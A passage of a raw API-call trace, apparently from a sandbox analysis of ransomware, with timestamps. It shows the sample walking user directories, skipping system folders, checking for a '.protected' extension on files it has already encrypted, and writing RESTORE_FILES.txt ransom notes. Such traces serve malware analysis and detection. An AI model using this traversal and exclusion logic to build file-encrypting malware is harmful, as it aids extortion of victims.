(lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected") returned 71 [0093.313] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] 
lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected") returned 75 [0093.314] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected") returned 70 [0093.314] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="System Volume 
Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected") returned 68 [0093.314] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected") returned 72 [0093.314] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 
[0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected") returned 79 [0093.314] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.protected") returned 72 [0093.314] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected") returned 72 [0093.315] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.protected") returned 70 [0093.315] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected") returned 74 [0093.315] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected") returned 70 [0093.315] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft 
Help\\MS.WINWORD.DEV.14.1033.hxn.protected") returned 74 [0093.316] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.316] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Program Files (x86)") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\nslist.hxl.protected") returned 58 [0093.316] StrStrIW (lpFirst="nslist.hxl.protected", lpSrch=".protected") returned=".protected" [0093.316] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt") returned 55 [0093.316] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.316] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.316] FindNextFileW 
(in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.316] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt") returned 55 [0093.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.316] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla") returned 30 [0093.317] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\*") returned 32 [0093.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.317] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\.") returned 32 [0093.317] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.317] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\..") returned 33 [0093.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.317] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs") returned 35 [0093.317] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="logs", lpString2="..") 
returned 1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*") returned 37 [0093.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\.") returned 37 [0093.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\..") returned 38 [0093.318] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="Windows") returned -1 [0093.318] lstrcmpiW 
(lpString1="maintenanceservice-install.log.protected", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.protected") returned 76 [0093.318] StrStrIW (lpFirst="maintenanceservice-install.log.protected", lpSrch=".protected") returned=".protected" [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt") returned 53 [0093.319] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.319] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.319] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.319] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.319] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt") returned 53 [0093.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\mozilla\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt") returned 48 [0093.319] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.319] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.319] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt") returned 48 [0093.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0093.319] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Windows") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Program Files") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Program Files (x86)") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="$Recycle.bin") returned 1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle") returned 29 [0093.319] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1 [0093.319] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\*") returned 31 [0093.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\.") returned 31 [0093.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Program 
Files") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\..") returned 32 [0093.320] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.320] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt") returned 47 [0093.320] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.320] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.320] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt") returned 47 [0093.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\oracle\\restore_files.txt"), 
